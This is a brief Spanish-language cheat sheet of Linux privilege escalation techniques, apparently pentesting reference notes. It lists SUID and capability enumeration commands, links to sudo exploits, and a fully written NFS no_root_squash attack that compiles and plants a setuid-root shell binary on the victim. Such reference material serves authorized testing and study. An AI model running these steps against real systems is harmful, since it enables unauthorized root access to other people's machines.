Linux Privesc

LD_Preload Privesc

LogoLinux Privilege Escalation using LD_Preload - Hacking ArticlesHacking Articles

Sudo binary privesc

Sudo <1.8.28

Logosudo 1.8.27 - Security BypassExploit Database

Sudo <1.8.30 y pwfeedback habilitado

LogoGitHub - saleemrashid/sudo-cve-2019-18634: Proof of Concept for CVE-2019-18634GitHub

SUID

find / -perm -u=s -type f 2>/dev/null

Capabilities

getcap -r / 2>/dev/null

NFS Root Squashing

cat /etc/exports
#Si una carpeta tiene la flag “no_root_squash” se puede montar con NFS y los archivos serán creados como root (id 0)
#Desde la máquina atacante
showmount -e <IP_VÍCTIMA>
mkdir /tmp/mountme
mount -o rw,vers=2 <IP_VÍCTIMA>:/tmp /tmp/mountme
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }’ > /tmp/mountme/x.c
gcc /tmp/mountme/x.c -o /tmp/mountme/x
chmod +s /tmp/mountme/x
#Desde la máquina víctima
./x

Tareas programadas

cat /etc/crontab
LogoPayloadsAllTheThings/Linux - Privilege Escalation.md at master · swisskyrepo/PayloadsAllTheThingsGitHub

Docker

Enlaces adicionales

AnteriorLinux BasicsSiguienteWindows

Última actualización